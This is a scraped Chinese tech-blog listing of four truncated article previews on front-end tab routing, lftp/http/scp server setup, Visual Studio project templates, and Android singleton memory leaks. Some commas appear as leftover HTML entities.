项目的需求是在一个页面内动态获取导航菜单&#xff0c;导航菜单切换的时候显示对应的路由页面&#xff0c;类似于tab切换的形式&#xff0c;切换的导航菜单和页面左侧导航菜单是同一个路由组件&#xff0c;只是放到了一个页面上&#xff0c;显示的个数不同&#xff0c;所有是动…

lftp服务与http服务(包含scp服务)详解

目录 前言: 1.lftp服务 1.1lftp服务的介绍以及应用场景 1.2安装lftp服务 1.2进行配置 1.3实际操作 2.http服务 2.1http服务介绍以及应用场景 2.1安装httpd服务 2.2进行配置 2.3实际操作 3.scp服务 3.1scp服务的介绍以及应用场景 致谢: 前言: 在当今互联网…

Visual Studio项目模板的创建与使用

Visual Studio项目模板的创建、使用、删除 创建模板项目模板的使用模板的删除 创建模板 点击项目&#xff0c;点击导出模板 选择你要创建哪个项目的项目模板&#xff0c;点击下一步 输入你的模板名称并添加模板说明&#xff0c;方便记忆 项目模板的使用 点击创建新项目 输入刚刚…

android中单例模式为什么会引起内存泄漏?

单例模式使用不恰当会造成内存泄漏。因为单例的静态特性使得单例的生命周期和应用的生命周期一样长&#xff0c; 如果一个对象已经不需要使用了&#xff0c;但是单例对象还持有该对象的引用&#xff0c;那么这个对象就不能被正常回收&#xff0c;因此会导致内存泄漏。 举个例子…